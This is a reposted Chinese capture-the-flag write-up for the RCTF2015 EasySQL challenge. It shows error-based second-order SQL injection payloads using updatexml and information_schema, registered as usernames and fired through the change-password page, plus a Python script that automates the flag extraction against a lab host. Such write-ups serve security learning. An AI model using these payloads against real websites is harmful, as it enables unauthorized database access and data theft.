碼上快樂

相關內容    簡體    繁體

[RCTF2015]EasySQL

本文轉載自   查看原文   2019-09-27 18:26   859    web's write up/ SQL Injection

[RCTF2015]EasySQL

  • EasySQL github

  • 打開靶機,是如下界面

  • 到注冊頁面,試了一下,usernameemail 處有過濾,直接 fuzz 一下哪些字符被禁了

  • 注冊成功之后,有一個修改密碼的功能,這里的考點應該就是二次注入

  • 它在存入數據庫時進行了特殊字符的處理,但是在修改密碼這里,從數據庫中讀取出來時,沒有對數據處理

  • 注冊用戶名 'sss"\ ,在修改密碼處的有個報錯的回顯

  • 可以猜出來 sql 語句應該是類似於這樣子的 select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e'

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

  • 經過測試,flag 不在 flag 表中

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

  • 發現輸出有長度限制

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

  • 這里就很尷尬了,所以不如 reverse 逆序輸出

  • username=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#

  • 放個腳本,代表了這一題的整個流程,也記錄的我的犯傻

    import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

pre = 'peri0d"'
suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
	register(paylaod)
	login(paylaod)
	changepwd()


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [RCTF2015]EasySQL RCTF-2015——welpwn XCTF Web upload(RCTF 2015) [極客大挑戰 2019]EasySQL SUCTF 2019-EasySQL buuctf Easysql 小記 [SUCTF 2019]EasySQL [極客大挑戰 2019]EasySQL [極客大挑戰 2019]EasySQL [RCTF]Pwn200 wp
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM